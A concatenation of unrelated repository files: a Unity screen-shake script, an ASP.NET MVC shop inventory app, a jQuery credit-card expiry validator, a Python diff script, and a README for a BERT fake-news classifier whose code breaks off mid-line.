!pausedFlooding; if (pausedFlooding) { Music.Pause(); SFX.PlayOneShot(pauseOn); } else { Music.Play(); SFX.PlayOneShot(pauseOff); } } public void SetRate(float newRate) { timeBetweenSpawns = newRate; } #endregion public void FunctionA() { } public void FunctionA(int x, float y) { } public void FunctionA(float x, int y) { } } <file_sep>using System.Collections; using System.Collections.Generic; using UnityEngine; public class ScreenShake : MonoBehaviour { public AnimationCurve magnitudeCurve; public float shakeDuration; public float shakeMagnitude; public void ShakeCamera() { StartCoroutine(Shake(shakeDuration, shakeMagnitude)); } public IEnumerator Shake(float duration, float magnitude) { Vector3 orignalPosition = transform.localPosition; Transform parentObject = transform.parent; float elapsed = 0f; float inverseLerp; while (elapsed < duration) { inverseLerp = Mathf.InverseLerp(0, duration, elapsed); float x = Random.Range(-1f, 1f) * (magnitude * magnitudeCurve.Evaluate(inverseLerp)); float y = Random.Range(-1f, 1f) * (magnitude * magnitudeCurve.Evaluate(inverseLerp)); transform.localPosition = orignalPosition + new Vector3(x, y, 0); elapsed += Time.deltaTime; yield return 0; } transform.parent = parentObject; transform.localPosition = orignalPosition; } }
d993a5e354abb4333d5056d65ea0f9cd01879f3f
[ "C#" ]
4
C#
jgonzale5/OptimizationDemo
7ba04277f67eb28a77f22e0082ef30d592262037
0c8da7fa25bf3061fb109a8945547df9b4519d61
refs/heads/master
<repo_name>Keuthonymous/Shop-MVC<file_sep>/MVCShop/Repositories/ItemRepository.cs using MVCShop.DataAccess; using MVCShop.Models; using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Helpers; using PagedList.Mvc; using PagedList; namespace MVCShop.Repositories { public class ItemRepository { StoreContext context = new StoreContext(); public object StoreContext { get; internal set; } public IEnumerable<StockItem> GetAllItems() { return context.Items.ToList(); } //public void AddNewItem(StockItem item) //{ // if (CheckShelfPosition(item) == false) // { // context.Items.Add(item); // context.SaveChanges(); // } //} public void RemoveItem(StockItem item) { context.Items.Remove(item); context.SaveChanges(); } public StockItem DetailsByArtNum(int? ArtNum) { return context.Items.SingleOrDefault(item => item.ArticleNumber == ArtNum); } public List<StockItem> GetByArtNum(int[] deleteInputs) { var query = (from i in context.Items where deleteInputs.Contains(i.ArticleNumber) select i).ToList(); return query; } public IEnumerable<StockItem> SearchByPriceOrName(string searchTerm = null) { var query = from i in context.Items where searchTerm == null || i.Name.StartsWith(searchTerm) orderby i.ArticleNumber select i; return query; } public void Edit(StockItem item) { context.Entry(item).State = System.Data.Entity.EntityState.Modified; context.SaveChanges(); } } }<file_sep>/MVCShop/Models/StockShelf.cs using System; using System.Collections.Generic; using System.ComponentModel.DataAnnotations; using System.Linq; using System.Web; namespace MVCShop.Models { public class StockShelf { [Key] public int ID { get; set; } [Required] public string ShelfName { get; set; } public virtual ICollection<StockItem> StockItems { get; set; } } }<file_sep>/MVCShop/Controllers/StockItemController.cs using MVCShop.Models; using MVCShop.Repositories; using System; using System.Collections.Generic; using System.Linq; using System.Net; using System.Web; using System.Web.Mvc; using PagedList; namespace MVCShop.Controllers { public class StockItemController : Controller { private ItemRepository repo; public StockItemController() { repo = new ItemRepository(); } public ActionResult Autocomplete(string term) { var AutocompleteList = repo.GetAllItems(); var query = (from i in AutocompleteList where i.Name.StartsWith(term) select new { label = i.Name }).Take(10); return Json(query, JsonRequestBehavior.AllowGet); } // GET: StockItem public ActionResult Index(string searchTerm = null) { if (Request.IsAjaxRequest()) { return PartialView("_Items", repo.SearchByPriceOrName(searchTerm)); } return View(repo.SearchByPriceOrName(searchTerm)); } public ActionResult Details(int id) { return View(repo.DetailsByArtNum(id)); } [HttpGet] public ActionResult Delete(int? id) { if (id == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } StockItem item = repo.DetailsByArtNum(id); if (id == null) { return HttpNotFound(); } return View(item); } [HttpPost, ActionName("Delete")] public ActionResult DeleteConfirmation(int id) { StockItem item = repo.DetailsByArtNum(id); repo.RemoveItem(item); return RedirectToAction("Index"); } [HttpGet] public ActionResult DeleteSelected(int[] deleteInputs) { if (deleteInputs == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } List<StockItem> removeList = repo.GetByArtNum(deleteInputs); if (deleteInputs == null) { return HttpNotFound(); } return View(removeList); } [HttpPost, ActionName("DeleteSelected")] public ActionResult DeleteSelectedConfirm(int[] deleteInputs) { List<StockItem> removeList = repo.GetByArtNum(deleteInputs); if (removeList != null) { foreach (var item in removeList) { repo.RemoveItem(item); } } return RedirectToAction("Index"); } [HttpGet] public ActionResult Create() { return View(); } //[HttpPost] //public ActionResult Create([Bind(Include = "ArticleNumber, Name, Price, ShelfPosition, Quantity, Description")] StockItem item) //{ // if (ModelState.IsValid && repo.CheckShelfPosition(item) == false) // { // repo.AddNewItem(item); // return RedirectToAction("Index"); // } // return View(item); //} [HttpGet] public ActionResult Edit(int? id) { if (id == null) { return new HttpStatusCodeResult(HttpStatusCode.BadRequest); } StockItem item = repo.DetailsByArtNum(id); if (item == null) { return HttpNotFound(); } return View(item); } [HttpPost] public ActionResult Edit([Bind(Include = "ArticleNumber, Name, Price, ShelfPosition, Quantity, Description")] StockItem item) { if (ModelState.IsValid) { repo.Edit(item); return RedirectToAction("Index"); } return View(item); } } }<file_sep>/MVCShop/Models/StockItem.cs using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.ComponentModel.DataAnnotations; using System.ComponentModel.DataAnnotations.Schema; namespace MVCShop.Models { public class StockItem { [Key] public int ArticleNumber { get; set; } [Required] [StringLength(1024)] public string Name { get; set; } [Range (0.1,100000)] public double Price { get; set; } public int Quantity { get; set; } [Required] [StringLength(140)] public string ItemDescription { get; set; } public virtual ICollection<Category> Categories { get; set; } [ForeignKey("StockShelf")] public int StockShelfID { get; set; } public virtual StockShelf StockShelf { get; set; } } }<file_sep>/MVCShop/Migrations/Configuration.cs namespace MVCShop.Migrations { using MVCShop.Models; using System; using System.Data.Entity; using System.Data.Entity.Migrations; using System.Linq; internal sealed class Configuration : DbMigrationsConfiguration<MVCShop.DataAccess.StoreContext> { public Configuration() { AutomaticMigrationsEnabled = true; } protected override void Seed(MVCShop.DataAccess.StoreContext context) { context.Items.AddOrUpdate( i => i.ArticleNumber, new StockItem { ArticleNumber = 1234, Name = "Monster", Price = 20.99, Quantity = 2 }, new StockItem { ArticleNumber = 1334, Name = "RedBull", Price = 16.99, Quantity = 3 }, new StockItem { ArticleNumber = 1434, Name = "Logitech G502 Proteus Spectrum", Price = 949.99, Quantity = 1 }, new StockItem { ArticleNumber = 1534, Name = "SteelSeries G6 V2", Price = 599.99, Quantity = 1 } ); context.Categories.AddOrUpdate( c => c.ID, new Category { Name = "Food", IsAgeRestricted = false, CatDescription = "This is food" }, new Category { Name = "Alcohol", IsAgeRestricted = true, CatDescription = "This is booze" }, new Category { Name = "Electronics", IsAgeRestricted = false, CatDescription = "These are fun things" } ); context.Shelves.AddOrUpdate( s => s.ID, new StockShelf { ShelfName = "A1" }, new StockShelf { ShelfName = "A2" }, new StockShelf { ShelfName = "A3" } ); } } }
c0a99318d3f33b549b64c7909bf60efad1e80631
[ "C#" ]
5
C#
Keuthonymous/Shop-MVC
cb18f9a6dc2216cde8e8ceb26507248387d45b64
87d8e3b0f81f0d78d0e2ad389feaf9434663dd8b
refs/heads/master
<file_sep>package ca.ualberta.cs.lonelytwitter; public class Tweet { private String tweet; private String date; public Tweet(String tweet, String date) { this.tweet = tweet; this.date = date; } }
4c992bd678c1676c4c9ca57f755ea5504839a817
[ "Java" ]
1
Java
tchang2/lonelyTwitter
8b76aa2be6ddcf8188ff7e7eb2ca6f731bd9b817
032b1e255d66dec515f39a2dc6599ca46e61e1d4
refs/heads/master
<file_sep>/* 1) Object.values() : we can access the values of an object by looping through the keys and then dynamically accessing the keys. This works if you need to access both the keys and the values. However, if you only need to access the values, then you can use Object.values() which returns an array of the values: */ const user = { id: 1, name: "<NAME>", age: 22 }; const values = Object.values(user); console.log(values); // [1, "<NAME>", 22] /* 2) Object.entries() : The Object.entries() method returns an array of arrays representing every key/value pair. Let's visualize it: */ const user = { id: 1, name: "<NAME>", age: 22 }; const entries = Object.entries(user); //The entries variable will return the following array of arrays: [ ["id", 1], ["name", "<NAME>"], ["age", 22] ] // This is especially useful in combination with for..in and array destructuring.
55ddbe37f410e30da71707cd4980e08d23e17ccf
[ "JavaScript" ]
1
JavaScript
navinojha/msk-javascript-bootcamp
5fab85d3ec62e4f84e97290c74cfc95b3e1b94c7
36587ac4cdc6cdaa4dcb8179d5ebacc80f7beea3
refs/heads/master
<repo_name>yb66/Captchachacha<file_sep>/spec/captchachacha_spec.rb require 'rspec' require 'rack/test' require 'rack/mock' require 'curb' require 'webmock/rspec' require 'securerandom' require_relative '../lib/rack/captchachacha.rb' describe "Rack::Captchachacha" do include Rack::Test::Methods before do WebMock.reset! WebMock.disable_net_connect! end def app main_app = lambda { |env| request = Rack::Request.new(env) return_code, body_text = case request.path when '/' then [200,'Hello world'] when '/login' if request.post? env['X-Captcha-Valid'] ? [200, 'post login'] : [200, 'post fail'] else [200,'login'] end else [404,'Nothing here'] end [return_code,{'Content-type' => 'text/plain'}, [body_text]] } builder = Rack::Builder.new builder.use Rack::Captchachacha builder.run main_app builder.to_app end context "basic request" do it "is a 200 ok response code" do get("/") last_response.status == 200 end it "should say hello" do get("/") last_response.body == "Hello world" end end # context context "a page that requires a captcha" do let(:session_id){ SecureRandom.random_number.to_s[2..-1] } let(:url_to_request) { "#{Rack::Captchachacha::VERIFY_URL}/#{session_id}/response" } it "should pass the captcha" do stub_request(:get, url_to_request).to_return({:body => "1"}) post "/login", {'captcha_session' => session_id, 'captcha' => 'response'} WebMock.should have_requested(:get, url_to_request) last_response.status.should == 200 last_response.body.should == 'post login' end it "should fail the captcha" do stub_request(:get, url_to_request).to_return({:body => "0"}) post "/login", {'captcha_session' => session_id, 'captcha' => 'response'} WebMock.should have_requested(:get, url_to_request) last_response.status.should == 200 last_response.body.should == 'post fail' end end # context end <file_sep>/Rakefile require 'rake' require 'rspec/core/rake_task' RSpec::Core::RakeTask.new(:spec) do |spec| spec.pattern = 'spec/*_spec.rb' spec.rspec_opts = ['-cf nested'] end task :default => :spec <file_sep>/lib/rack/captchachacha.rb # encoding: utf-8 require_relative './captchachacha/helpers.rb' module Rack class Captchachacha VERIFY_URL = "http://captchator.com/captcha/check_answer" CHALLENGE_FIELD = 'captcha_session' RESPONSE_FIELD = 'captcha' DEFAULT_MESSAGE = "Incorrect response, please try again." RESULT_HEADER = 'X-Captcha-Valid' RESULT_MESSAGE = 'X-Captcha-Msg' # @param app Rack application # @param [optional,Hash] options Hash of options # @option options [String, Array<String>] paths Where user goes to login or access the captcha. def initialize( app, options={} ) @app = app # this is here because it's in the Rack::Recaptcha API, I've no idea what it does really. @paths = options[:paths] && [options[:paths]].flatten.compact end def call(env) dup._call env end # @param env Rack environment def _call(env) request = Request.new(env) if request.params[CHALLENGE_FIELD] && request.params[RESPONSE_FIELD] result, msg = verify( request.params[CHALLENGE_FIELD].to_i, request.params[RESPONSE_FIELD] ) # captchator doesn't give an error message, but in the spirit of keeping a similar API # to reCAPTCHA, and because it's an easy place to stick a default error message, I'll # pretend that `verify` returns two results. # If it's a fail then the usual course of action would be to redirect back to the # captcha form, but on success to continue, so the error message will be ignored unless # of failure. msg ||= DEFAULT_MESSAGE env.merge!(RESULT_HEADER => result == true, RESULT_MESSAGE => msg ) end @app.call(env) end def verify( session_id, answer ) return false if session_id == 0 || session_id.nil? return false if answer.nil? require 'curb' Curl::Easy.perform("#{VERIFY_URL}/#{session_id}/#{answer}").body_str == "1" end # def end # class end # Rack<file_sep>/captchachacha.gemspec # -*- encoding: utf-8 -*- lib = File.expand_path('./lib') $:.unshift lib unless $:.include?(lib) require 'rack/captchachacha/version' Gem::Specification.new do |s| s.name = "captchachacha" s.summary = "Captchator for rack with helpers for sinatra" s.description = <<-EOF Captchator as Rack middleware, and helpers for sinatra. EOF s.version = Rack::Captchachacha::VERSION s.platform = Gem::Platform::RUBY s.require_path = "lib" s.required_ruby_version = ">= 1.9.2" s.authors = ["<NAME>"] s.files = `git ls-files`.split("\n") s.add_dependency("rack", "~> 1.3.0") s.add_dependency("curb", "~> 0.7.15") s.email = ["iainspeed <EMAIL>@ <EMAIL>"] s.homepage = "https://github.com/yb66/Captchachacha" s.test_files = `git ls-files -- {test,spec,features}`.split("\n") s.signing_key = ENV['HOME'] + '/.ssh/gem-private_key.pem' s.cert_chain = [ENV['HOME'] + '/.ssh/gem-public_cert.pem'] end <file_sep>/lib/rack/captchachacha/helpers.rb # encoding: utf-8 # @author <NAME> # # A module to take advantage of the http://captchator.com service module Rack class Captchachacha module Helpers require 'securerandom' def captcha_valid? request.env['X-Captcha-Valid'] end # def def captcha_session @captcha_session ||= SecureRandom.random_number.to_s[2..-1] end def captcha_answer_tag %Q!<input id="captcha_answer" name="captcha_answer" type="text" size="6"/>! end def captcha_image_tag %Q!<input id="captcha_session" name="captcha_session" type="hidden" value="#{captcha_session}"/><img id="captcha_image" src="http://captchator.com/captcha/image/#{captcha_session}"/>! end end # Helpers end # Captchachacha end # Rack
166d634289d8d9155274aae2d2dbb213d6a83275
[ "Ruby" ]
5
Ruby
yb66/Captchachacha
cf5b3c11d02a4dee75b00f04150c066b827ddd15
9846630db02797f7c32112f0c963de8611ddbb3a
refs/heads/master
<file_sep>$(document).ready(function() { let checkMonthValue = /^\d+$/; //MONTH VALIDATION $.validator.addMethod('validMonth', function(value, element) { let zeroPosition = value.indexOf('0') == 0; if (value >= 10 && value <= 12) { zeroPosition = value; } else if (value < 10) { zeroPosition = value.indexOf('0') == 0; } return value.length == 2 && checkMonthValue.test(value) && zeroPosition; }, 'Please enter a valid month.'); //YEAR VALIDATION $.validator.addMethod('validYear', function(value, element) { if (value >= 10 && value <= 99) { return value.length == 2 && checkMonthValue.test(value); } }, 'Please enter a valid year.'); $("#donation-form").validate({ rules: { month: { required: true, validMonth: true }, year: { required: true, validYear: true }, }, messages: { month: { required: "Please enter the expiration month." }, year: { required: "Please enter the expiration year." }, }, highlight: function(messages) { $('messages').addClass('error'); }, }); }); <file_sep>### jQuery Validation Exercise **Technologies used:** JavaScript, jQuery **Goal:** To create a form consisting of two fields and a submit button which represent the credit card payment section of an online transaction. The first field and second field represent the expiration month and expiration year, respectively. The following jQuery validation plugin was used <https://jqueryvalidation.org/>. If the user tries to submit an empty form, the user would be prompted with messages to fill them out. <img src="demo_blank_form.gif"> If the user incorrectly fills out the form, a message will prompt the user to input a valid month. ​ <img src="demo_error.gif"> If the information has been correctly entered, the form will be submitted. <img src="demo_submit.gif">
0e1dddc57239c74fe345ce0d6c5068e3e00b8c7d
[ "JavaScript", "Markdown" ]
2
JavaScript
LauraSchneider/jquery-challenge
4ab19a55317ff1d501e41ef487647b9cdab434c8
74ae95e8f47e58d16ce940e18fb0dfe39838960c
refs/heads/master
<file_sep>import difflib file_1=open('/Users/wangyifan/Desktop/Bert_v2_2(upper_case).ipynb','r',encoding='utf-8').readlines() file_2=open('/Users/wangyifan/Desktop/bert_v2_0(lowest_loss).ipynb','r',encoding='utf-8').readlines() d=difflib.HtmlDiff() results=d.make_file(file_1,file_2) # 返回HTML形式的比较字符串 with open('results.html','w') as file: file.write(results) # 将比较结果保存在results.html文件中<file_sep># Google-BERT-on-fake_or_real-news-dataset **Description**: Use Google BERT on fake_or_real news dataset with best f1 score: 0.986 Table of Contents ================= * [Google-BERT-on-fake_or_real-news-dataset](#google-bert-on-fake_or_real-news-dataset) * [Showcase](#showcase) * [1. Pipeline](#1-pipeline) * [2. Part1: Data processing](#2-part1-data-processing) * [3. Part2: Bert Model](#3-part2-bert-model) * [4. Part3: Result](#4-part3-result) * [5. Part4: Reference](#5-part4-reference) * [Implementation](#implementation) * [1. Preparation](#1-preparation) * [1.1 Set parameters and install and load required package](#11-set-parameters-and-install-and-load-required-package) * [1.2 Set tokenizer](#12-set-tokenizer) * [1.3 Define Bert Config](#13-define-bert-config) * [2. Dataset Processing](#2-dataset-processing) * [2.1 Read the data and convert label into binary text](#21-read-the-data-and-convert-label-into-binary-text) * [2.2 Combine the title and text](#22-combine-the-title-and-text) * [2.3 Use regular expression to drop non-sentence](#23-use-regular-expression-to-drop-non-sentence) * [2.4 Use EDA method to augment the text](#24-use-eda-method-to-augment-the-text) * [3. Google Bert](#3-google-bert) * [3.1 Create data dictionary](#31-create-data-dictionary) * [3.2 Define the train model](#32-define-the-train-model) * [4. Final output](#4-final-output) * [4.1 Model details](#41-model-details) * [4.2 F1 and other details](#42-f1-and-other-details) # Showcase ## 1. Pipeline ![Pipeline](https://i.loli.net/2019/08/23/P8Seo5EvmpZfAOT.png) First, we got the raw text with title, text and label. Then we use some methods of data processing to operate the text. After the data processing, we put them into the Bert model to train the data, which includes the Bert itself and the Classifier, here I used the feed-forward neural network and add a softmax layer to normalize the output. In the end, we got the predication and other details. ## 2. Part1: Data processing (1) **Drop non-sentence** • Type1: http[s]://www.claritypress.com/LendmanIII.html • Type2: [email protected] • Type3: @EP_President #EP_President • Type4: **Want FOX News First * in your inbox every day? Sign up here.** • Type5: ☮️ 💚 🌍 etc (2) **EDA methods** • Insert word by BERT similarity (Random Insertion) • Substitute word by BERT similarity (Synonym Replacement) AS for the first part, I use two methods: drop non-sentence and some EDA methods. I read some text within the fake_or_real news and I find that it contains various type of non-sentence, so I use the regular expression to drop them. And then, I use random insertion and synonym replacement to augment the text. ## 3. Part2: Bert Model ![Bert model](https://i.loli.net/2019/08/23/pFv1K86WUcafyDI.png) As for the second part, we put the text which we got from the first part into the bert model. The Bert model uses 12 encode layers and finally classifier to get the output. ## 4. Part3: Result ![Result](https://i.loli.net/2019/08/23/aGTYdfz2cul1pj3.png) In the end, we combine different methods of data processing and u can see the f1 score from the chart. We get the best f1 score(0.986) from Cased text + drop sentence. ## 5. Part4: Reference (1) **EDA**: •Knowledge: https://towardsdatascience.com/these-are-the-easiest-data-augmentation-techniques-in-natural-language-processing-you-can-think-of-88e393fd610 •Implemenation: https://github.com/makcedward/nlpaug (2) **Can’t remove stopwords**: •Deeper Text Understanding for IR with Contextual NeuralLanguage Modeling: https://arxiv.org/pdf/1905.09217 •Understanding the Behaviors of BERT in Ranking : https://arxiv.org/pdf/1904.07531 (3) **Bert by Pytorch**: •https://pytorch.org/hub/huggingface_pytorch-pretrained-bert_bert/ (4) **Bert Demo**: https://github.com/sugi-chan/custom_bert_pipeline (5) **Dataset**: https://cbmm.mit.edu/sites/default/files/publications/fake-news-paper-NIPS.pdf I learn the EDA from the two web site and through two articles, I learn that we shouldn’t remove Stopwords which otherwise will destroy the context of sentence. The end is implementation of BERT with Pytorch and the Bert model I learned. # Implementation ## 1. Preparation ### 1.1 Set parameters and install and load required package ```Python ## parameters Setting par_cased = 0 # default cased, 0 means uncased par_cleanup = 1 # default cleanup, 0 means non-cleanup par_eda = 0 # default eda, 0 means non-eda pip install pytorch_pretrained_bert nlpaug bert matplotlib sklearn librosa SoundFile nltk pandas from __future__ import print_function, division import torch import torch.nn as nn import torch.optim as optim from torch.optim import lr_scheduler import numpy as np import torchvision from torchvision import datasets, models, transforms import matplotlib.pyplot as plt import time import os import copy from torch.utils.data import Dataset, DataLoader from PIL import Image from random import randrange import torch.nn.functional as F from sklearn.metrics import roc_curve, auc import nlpaug.augmenter.char as nac #import nlpaug.augmenter.word as naw import nlpaug.flow as naf from nlpaug.util import Action ``` ### 1.2 Set tokenizer ```Python import torch from pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM # OPTIONAL: if you want to have more information on what's happening, activate the logger as follows import logging logging.basicConfig(level=logging.INFO) # Load pre-trained model tokenizer (vocabulary) if par_cased ==1: tokenizer = BertTokenizer.from_pretrained('bert-base-cased') else: tokenizer = BertTokenizer.from_pretrained('bert-base-uncased') ``` ### 1.3 Define Bert Config ```Python class BertLayerNorm(nn.Module): def __init__(self, hidden_size, eps=1e-12): """Construct a layernorm module in the TF style (epsilon inside the square root). """ super(BertLayerNorm, self).__init__() self.weight = nn.Parameter(torch.ones(hidden_size)) self.bias = nn.Parameter(torch.zeros(hidden_size)) self.variance_epsilon = eps def forward(self, x): u = x.mean(-1, keepdim=True) s = (x - u).pow(2).mean(-1, keepdim=True) x = (x - u) / torch.sqrt(s + self.variance_epsilon) return self.weight * x + self.bias class BertForSequenceClassification(nn.Module): """BERT model for classification. This module is composed of the BERT model with a linear layer on top of the pooled output. Params: `config`: a BertConfig class instance with the configuration to build a new model. `num_labels`: the number of classes for the classifier. Default = 2. Inputs: `input_ids`: a torch.LongTensor of shape [batch_size, sequence_length] with the word token indices in the vocabulary. Items in the batch should begin with the special "CLS" token. (see the tokens preprocessing logic in the scripts `extract_features.py`, `run_classifier.py` and `run_squad.py`) `token_type_ids`: an optional torch.LongTensor of shape [batch_size, sequence_length] with the token types indices selected in [0, 1]. Type 0 corresponds to a `sentence A` and type 1 corresponds to a `sentence B` token (see BERT paper for more details). `attention_mask`: an optional torch.LongTensor of shape [batch_size, sequence_length] with indices selected in [0, 1]. It's a mask to be used if the input sequence length is smaller than the max input sequence length in the current batch. It's the mask that we typically use for attention when a batch has varying length sentences. `labels`: labels for the classification output: torch.LongTensor of shape [batch_size] with indices selected in [0, ..., num_labels]. Outputs: if `labels` is not `None`: Outputs the CrossEntropy classification loss of the output with the labels. if `labels` is `None`: Outputs the classification logits of shape [batch_size, num_labels]. Example usage: ```python # Already been converted into WordPiece token ids input_ids = torch.LongTensor([[31, 51, 99], [15, 5, 0]]) input_mask = torch.LongTensor([[1, 1, 1], [1, 1, 0]]) token_type_ids = torch.LongTensor([[0, 0, 1], [0, 1, 0]]) config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072) num_labels = 2 model = BertForSequenceClassification(config, num_labels) logits = model(input_ids, token_type_ids, input_mask) ``` """ def __init__(self, num_labels=2): super(BertForSequenceClassification, self).__init__() self.num_labels = num_labels if par_cased ==1: self.bert = BertModel.from_pretrained('bert-base-cased') else: self.bert = BertModel.from_pretrained('bert-base-uncased') self.dropout = nn.Dropout(config.hidden_dropout_prob) self.classifier = nn.Linear(config.hidden_size, num_labels) nn.init.xavier_normal_(self.classifier.weight) def forward(self, input_ids, token_type_ids=None, attention_mask=None, labels=None): _, pooled_output = self.bert(input_ids, token_type_ids, attention_mask, output_all_encoded_layers=False) pooled_output = self.dropout(pooled_output) logits = self.classifier(pooled_output) return logits def freeze_bert_encoder(self): for param in self.bert.parameters(): param.requires_grad = False def unfreeze_bert_encoder(self): for param in self.bert.parameters(): param.requires_grad = True from pytorch_pretrained_bert import BertConfig config = BertConfig(vocab_size_or_config_json_file=32000, hidden_size=768, num_hidden_layers=12, num_attention_heads=12, intermediate_size=3072) num_labels = 2 model = BertForSequenceClassification(num_labels) # Convert inputs to PyTorch tensors #tokens_tensor = torch.tensor([tokenizer.convert_tokens_to_ids(zz)]) #logits = model(tokens_tensor) ``` ## 2. Dataset Processing ### 2.1 Read the data and convert label into binary text ```Python import pandas as pd dat = pd.read_csv('/data/fake_or_real_news.csv') dat.head() dat = dat.drop(columns=['Unnamed: 0', 'title_vectors']) for i in range(len(dat)): if dat.loc[i, 'label'] == "REAL": #REAL equal 0 dat.loc[i, 'label'] = 0 elif dat.loc[i, 'label'] == "FAKE": #FAKE equal 1 dat.loc[i, 'label'] = 1 if dat.loc[i, 'text'] == "": dat = dat.drop([i]) dat.head() ``` ### 2.2 Combine the title and text ```Python dat_plus = dat.copy() dat_plus['title_text']=dat['title']+'. '+dat['text'] dat_plus = dat_plus.drop(columns=['title', 'text']) dat_plus['title_text'] ``` ### 2.3 Use regular expression to drop non-sentence ```Python import re def cleanup(text): if par_cased == 0: # transfer into lower text if par_cased is false text = text.lower() text = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','',text) # drop http[s]://* text = re.sub(u"\\{.*?}|\\[.*?]",'',text) # drop [*] text = re.sub(u"\(\@.*?\s", '', text) # drop something like (@EP_President) text = re.sub(u"\@.*?\s", '', text) # drop soething liek @EP_President text = re.sub(u"\#.*?\s", '', text) # drop something like #EP_President (maybe hashtag) text = re.sub(u"\© .*?\s", '', text) # drop something like © EP_President text = re.sub(r'pic.tw(?:[a-zA-Z]|[0-9]|[$-_@.&+#]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+','',text) # drop pic.twitter.com/* text = re.sub(u"\*\*", '', text) # drop something like **Want FOX News First * in your inbox every day? Sign up here.** text = re.sub(u"|•|☮️|💚|🌍|😍|♦|☢", '', text) # drop something like  and • etc return(text) ``` ### 2.4 Use EDA method to augment the text ```Python import nlpaug.augmenter.char as nac import nlpaug.augmenter.word as naw import nlpaug.flow as nafc from nlpaug.util import Action import nltk nltk.download('punkt') if par_cased ==1: aug = naf.Sequential([ naw.BertAug(action="substitute", aug_p=0.8, aug_n=20,model_path='bert-base-cased',tokenizer_path='bert-base-cased'), naw.BertAug(action="insert", aug_p=0.1) ]) else: aug = naf.Sequential([ naw.BertAug(action="substitute", aug_p=0.8, aug_n=20,model_path='bert-base-uncased',tokenizer_path='bert-base-uncased'), naw.BertAug(action="insert", aug_p=0.1) ]) def aug_text(text): text = aug.augment(text) return(text) from nltk.tokenize import sent_tokenize def sentence_token_nltk(text): sent_tokenize_list = sent_tokenize(text) return sent_tokenize_list def eda_text(text): if len(text) < 2: return(text) # split text into sentences text = sentence_token_nltk(text) if len(text) <= 1: return(text) if len(text) == 2: for i in range(len(text)): if i == 0: tmp_text = text[i] else: tmp_text += text[i] return(tmp_text) # operate prior 3 sentences for i in range(3): if i == 0: tmp_text = text[i] else: tmp_text += text[i] zz = tokenizer.tokenize(tmp_text) # operate proper sentences if len(zz) <= 500: #print(len(zz)) tmp_text = aug_text(tmp_text) # conbine prior 3 sentences and rest sentences for j in range(len(text)-3): tmp_text += text[j+3] return(tmp_text) if par_eda == 1: # use eda to operate sentences when par_eda is true for i in range(len(dat_plus['title_text'])): if i%6 == 1: #print(i) dat_plus['title_text'][i] = copy.deepcopy(eda_text(dat_plus['title_text'][i])) dat_plus['title_text'][i] = "".join(dat_plus['title_text'][i]) ``` ## 3. Google Bert ```Python import torch.nn.functional as F #F.softmax(logits,dim=1) from sklearn.model_selection import train_test_split if par_cleanup == 1: X = dat_plus['title_text'].apply(cleanup) else: X = dat_plus['title_text'] y = dat_plus['label'] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=42) X_train = X_train.values.tolist() X_test = X_test.values.tolist() y_train = pd.get_dummies(y_train).values.tolist() # convert to one-hot encoding y_test = pd.get_dummies(y_test).values.tolist() max_seq_length = 256 class text_dataset(Dataset): def __init__(self,x_y_list, transform=None): self.x_y_list = x_y_list self.transform = transform def __getitem__(self,index): tokenized_title_text = tokenizer.tokenize(self.x_y_list[0][index]) if len(tokenized_title_text) > max_seq_length: tokenized_title_text = tokenized_title_text[:max_seq_length] ids_title_text = tokenizer.convert_tokens_to_ids(tokenized_title_text) #tokens->input_ids padding = [0] * (max_seq_length - len(ids_title_text)) ids_title_text += padding # use padding to make the same ids assert len(ids_title_text) == max_seq_length #print(ids_title_text) ids_title_text = torch.tensor(ids_title_text) label = self.x_y_list[1][index] # color list_of_labels = [torch.from_numpy(np.array(label))] return ids_title_text, list_of_labels[0] def __len__(self): return len(self.x_y_list[0]) ``` ### 3.1 Create data dictionary ```Python batch_size = 16 # divide into 16 batches train_lists = [X_train, y_train] test_lists = [X_test, y_test] training_dataset = text_dataset(x_y_list = train_lists ) test_dataset = text_dataset(x_y_list = test_lists ) dataloaders_dict = {'train': torch.utils.data.DataLoader(training_dataset, batch_size=batch_size, shuffle=True, num_workers=0), 'val':torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=True, num_workers=0) } dataset_sizes = {'train':len(train_lists[0]), 'val':len(test_lists[0])} device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") print(device) ``` ### 3.2 Define the train model ```Python def train_model(model, criterion, optimizer, scheduler, num_epochs=25): since = time.time() print('starting') best_model_wts = copy.deepcopy(model.state_dict()) best_loss = 100 best_f1 = 0.978 best_acc_test = 0.96 best_acc_train = 0.96 best_auc = 0.96 for epoch in range(num_epochs): print('Epoch {}/{}'.format(epoch, num_epochs - 1)) print('-' * 10) # Each epoch has a training and validation phase for phase in ['train', 'val']: if phase == 'train': scheduler.step() model.train() # Set model to training mode else: model.eval() # Set model to evaluate mode running_loss = 0.0 label_corrects = 0 TP = 0 TN = 0 FN = 0 FP = 0 total_scores = [] total_tar = [] # Iterate over data. for inputs, label in dataloaders_dict[phase]: #inputs = inputs #print(len(inputs),type(inputs),inputs) #inputs = torch.from_numpy(np.array(inputs)).to(device) inputs = inputs.to(device) label = label.to(device) # zero the parameter gradients optimizer.zero_grad() # forward # track history if only in train with torch.set_grad_enabled(phase == 'train'): # acquire output outputs = model(inputs) outputs = F.softmax(outputs,dim=1) loss = criterion(outputs, torch.max(label.float(), 1)[1]) # backward + optimize only if in training phase if phase == 'train': loss.backward() optimizer.step() # statistics running_loss += loss.item() * inputs.size(0) label_corrects += torch.sum(torch.max(outputs, 1)[1] == torch.max(label, 1)[1]) #返回每一行中最大值的那个元素,且返回其索引(返回最大元素在这一行的列索引) pred_choice = torch.max(outputs, 1)[1] target = torch.max(label, 1)[1] scores = pred_choice.cpu().tolist() tar = target.cpu().tolist() total_scores = total_scores + scores total_tar = total_tar + tar tmp_tp = 0 tmp_tn = 0 tmp_fn = 0 tmp_fp = 0 if pred_choice.numel()!= target.numel(): print("error") for i in range(pred_choice.numel()): if pred_choice[i] == 1 and target[i] 